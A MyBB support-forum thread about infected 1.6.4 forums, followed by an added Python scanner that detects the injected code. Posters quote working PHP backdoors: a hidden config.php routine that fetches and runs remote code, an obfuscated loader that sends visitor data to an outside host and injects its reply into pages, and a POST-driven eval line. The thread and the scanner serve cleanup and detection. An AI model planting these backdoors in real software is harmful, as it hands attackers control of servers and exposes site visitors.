MyBB Community Forums

Full Version: 1.6.4 Security Vulnerability
Every infected MyBB forum must check inc/config.php.

After several blank lines there is a malicious script:

```php
// Backdoor appended to inc/config.php. Triggered by ?pingnow=...&pass=...&file=...
if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    // The "password" is this fixed string; the caller just passes it in ?pass=
    if ($_GET['pass'] == '06f7c042b76e4b04f698c75b7b2777ea') {
        // Mode 1 (?pingnow=exec&file=URL): download the remote file into a randomly
        // named .php in the web server's working directory (normally the forum root)
        // and redirect the browser to it, i.e. drop and launch a web shell.
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0, 100)) . '.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        // Mode 2 (?pingnow=eval&file=URL): fetch remote PHP source and eval() it in
        // the forum's process, leaving nothing on disk.
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}
```


I don't know what this script does.

Anyway, please remove it soon.




And again, search for all index.php and showthread.php files on the server to remove the malicious script:

```php
<?php
// Stage 1: obfuscated loader. $_X is base64-encoded and then scrambled with
// strtr('123456aouie','aouie123456'); the second base64 string decodes to the unpacker:
//   $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');
//   $_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
// Unpacked, $_X is  ?><?php $url = 'http://91.196.216.30/bt.php'; ?>  and the eval() sets $url.
$_F = __FILE__;
$_X = 'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));

// Stage 2: collect the visitor's details and append them to the remote URL.
$ua   = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip   = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri  = urlencode($_SERVER['REQUEST_URI']);
$ref  = urlencode($_SERVER['HTTP_REFERER']);
$url  = $url . '?ip=' . $ip . '&host=' . $host . '&uri=' . $uri . '&ua=' . $ua . '&ref=' . $ref;

// Stage 3: whatever the remote script returns is echoed straight into the page
// served to the visitor (injected HTML/JavaScript, redirects, etc.).
$tmp = file_get_contents($url);
echo $tmp;
?>
```

I know this script is sending our traffic information to the hacker's server, and it can even run more code on our server later using the "eval" function (so it's dangerous!).


And again, don't forget to change your MySQL and cPanel passwords.


And again, my suggestion is to change the file permissions of config.php to 444 (so nobody can rewrite the file again).

I ran "Check Templates" and the 'header_welcomeblock_member_admin' template came back with an error.

Below is what is in the mentioned template:
Quote: <a href="{$mybb->settings['bburl']}/{$config['admin_dir']}/index.php">{$lang->welcome_admin}</a>

And the default template:
Quote: &mdash; <a href="{$mybb->settings['bburl']}/{$admin_dir}/index.php">{$lang->welcome_admin}</a>

What does the difference mean?
That's nothing related to this vulnerability. Either ignore it, or replace {$config['admin_dir']} with {$admin_dir}.

Changes to the template system in MyBB 1.6.4 made using internal variables such as $config['admin_dir'] impossible.
Thought so. Thanks for the verification, sir.
Curious but was an email sent out to the mailing list? I don't recall getting one.
(2011-10-15, 04:33 PM) labrocca Wrote: Curious but was an email sent out to the mailing list? I don't recall getting one.

+1, Jesse. That would have been nice. I got nailed by this and didn't figure out what it was until I visited this forum.
After the fact, I did the usual two-week update check in the AdminCP and saw the alert there.

I'm not one to complain, but I think a mass mailing would have been nice, and STILL might be a good idea. Not everyone monitors their forums like they need to in order to catch this kind of thing.

I am grateful to everyone who was part of the solution. Great work, guys. I got my boards sorted out very quickly.
In addition to the files already mentioned (/index.php, /showthread.php, /admin/config.php), I also found malignant code in /archive/index.php and /admin/index.php.
(2011-10-17, 02:20 PM) Reserector Wrote:
(2011-10-15, 04:33 PM) labrocca Wrote: Curious but was an email sent out to the mailing list? I don't recall getting one.

+1, Jesse. That would have been nice. I got nailed by this and didn't figure out what it was until I visited this forum.
After the fact, I did the usual two-week update check in the AdminCP and saw the alert there.

I'm not one to complain, but I think a mass mailing would have been nice, and STILL might be a good idea. Not everyone monitors their forums like they need to in order to catch this kind of thing.

I am grateful to everyone who was part of the solution. Great work, guys. I got my boards sorted out very quickly.

Yes and I'd like to see the MyBB Twitter used too for releases, news, and security (especially security) information.

http://twitter.com/#!/MyBBGroup

MyBB has 1300+ followers. And Twitter is super easy to use and serves an excellent purpose of disseminating information FAST. Also the retweet is nice and might help spread information as well.

I heard of the issue through Twitter.
According to
(2011-10-15, 05:19 AM) seminar techi Wrote: every infected mybb forum must check...

there are some more files which ought to be checked:

/inc/languages/deutsch_du/datahandler_user.lang.php

/inc/plugins/mp3.php

/inc/languages/english/admin/tools_php_info.lang.php

These files may have two extra last lines, which can be invisible in a text editor. The following malicious code can be inside:

```php
// Runs any PHP the attacker sends base64-encoded in the POST field "update".
if (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}
```

These files do not have the PHP end tag
?>

It seems that these files spread around the server and infect PHP files from other programs too. I advise you to look for the words "eval" and "base64_decode", which ought to be together on a line with "$_POST".

Please edit these malicious lines and change the passwords on your server.

Please look for unmatched files when comparing the original download of a fresh MyBB copy with your forums on your server. I have found a new file which seems to be unknown to MyBB:

forums/inc/languages/english/imgs.classs.php

It's a very big file. If anyone is interested to get the code, I can post it once more.
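A scanner for the indicators quoted in this thread (the pingnow backdoor in inc/config.php, the $_F=__FILE__ loader prepended to index.php and showthread.php, and the $_POST eval line appended to language files) together with the compare-against-a-fresh-copy check suggested in the posts above, as an added example that is not code from the thread or from MyBB. The directory layout, file names and file contents in build_demo() are constructed for the demo; only the regexes and the loader's $_X payload come from the thread. It also unpacks that payload the same way the loader's own eval would (base64, then the fixed strtr alphabet swap), so the remote URL can be read without executing anything.

```python
# Added example (not code from this thread or from MyBB): scan a forum tree for the
# infection indicators quoted in the thread and compare it against a clean MyBB download.
# Layout, file names and contents in build_demo() are constructed for this demo.
import base64
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# $_X payload of the index.php/showthread.php loader quoted in the thread.
THREAD_LOADER_PAYLOAD = "Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+"

# One regex per injected code shape posted in the thread.
INDICATORS = {
    "pingnow-backdoor": re.compile(r"\$_GET\[\s*['\"]pingnow['\"]\s*\]"),
    "post-eval-backdoor": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST\b", re.I),
    "strtr-loader": re.compile(r"\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*=\s*['\"]"),
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
}


def scan_file(path: Path) -> list:
    """Names of the indicators found in one file, in INDICATORS order."""
    text = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: Path) -> dict:
    """Relative path -> indicator names, for every .php file with at least one hit."""
    hits = {}
    for p in sorted(root.rglob("*.php")):
        found = scan_file(p)
        if found:
            hits[p.relative_to(root).as_posix()] = found
    return hits


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def compare_trees(clean: Path, live: Path, ignore=("inc/config.php", "inc/settings.php")):
    """(unknown, modified): files absent from the clean copy, and files whose bytes differ.
    inc/config.php and inc/settings.php differ on every install, so the byte comparison
    skips them and leaves them to scan_tree()."""
    clean_hashes = {p.relative_to(clean).as_posix(): sha256(p)
                    for p in clean.rglob("*") if p.is_file()}
    unknown, modified = [], []
    for p in sorted(live.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(live).as_posix()
        if rel not in clean_hashes:
            unknown.append(rel)
        elif rel not in ignore and sha256(p) != clean_hashes[rel]:
            modified.append(rel)
    return unknown, modified


def decode_strtr_loader(payload: str) -> str:
    """Unpack a $_X payload the way the loader's eval does (base64, then the fixed
    strtr alphabet swap) without executing it, so the remote URL can be read safely."""
    raw = base64.b64decode(payload).decode("latin-1")
    return raw.translate(str.maketrans("123456aouie", "aouie123456"))


def build_demo(base: Path):
    """Constructed sample: a 'clean' tree and a 'live' tree carrying the three injections
    plus one dropped file. Contents are placeholders, not real MyBB sources."""
    clean, live = base / "clean", base / "live"
    for root in (clean, live):
        (root / "inc" / "languages" / "english").mkdir(parents=True)
    index = "<?php\n// placeholder for MyBB index.php\necho 'forum';\n"
    config = "<?php\n$config['database']['type'] = 'mysqli';\n"
    lang = "<?php\n$l['greeting'] = 'Hello';\n?>\n"
    (clean / "index.php").write_text(index)
    (clean / "inc" / "config.php").write_text(config)
    (clean / "inc" / "languages" / "english" / "user.lang.php").write_text(lang)
    loader = ("<?php $_F=__FILE__;$_X='" + THREAD_LOADER_PAYLOAD + "';"
              "eval(base64_decode('...')); ?>\n")
    backdoor = ("\n\n\n\nif (isset($_GET['pingnow'])&& isset($_GET['pass'])){\n"
                "  /* downloader / eval body as quoted in the thread */\n}\n")
    post_eval = "\nif (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}"
    (live / "index.php").write_text(loader + index)
    (live / "inc" / "config.php").write_text(config + backdoor)
    (live / "inc" / "languages" / "english" / "user.lang.php").write_text(
        lang.replace("?>\n", "") + post_eval)  # closing tag gone, as the post describes
    (live / "inc" / "languages" / "english" / "imgs.classs.php").write_text("<?php // dropped file\n")
    return clean, live


def run_demo() -> dict:
    base = Path(tempfile.mkdtemp(prefix="mybb-scan-"))
    try:
        clean, live = build_demo(base)
        unknown, modified = compare_trees(clean, live)
        return {"hits": scan_tree(live), "unknown": unknown, "modified": modified,
                "loader_decoded": decode_strtr_loader(THREAD_LOADER_PAYLOAD)}
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)  # loader_decoded -> ?><?php $url = 'http://91.196.216.30/bt.php'; ?>
```

On a real server, point scan_tree() at the forum root and compare_trees() at an unpacked copy of the same MyBB release; the pattern scan catches edited files (including inc/config.php, which the hash comparison deliberately ignores because it differs on every install), the hash comparison catches dropped files such as the imgs.classs.php mentioned above and edits that use an obfuscation the regexes do not know.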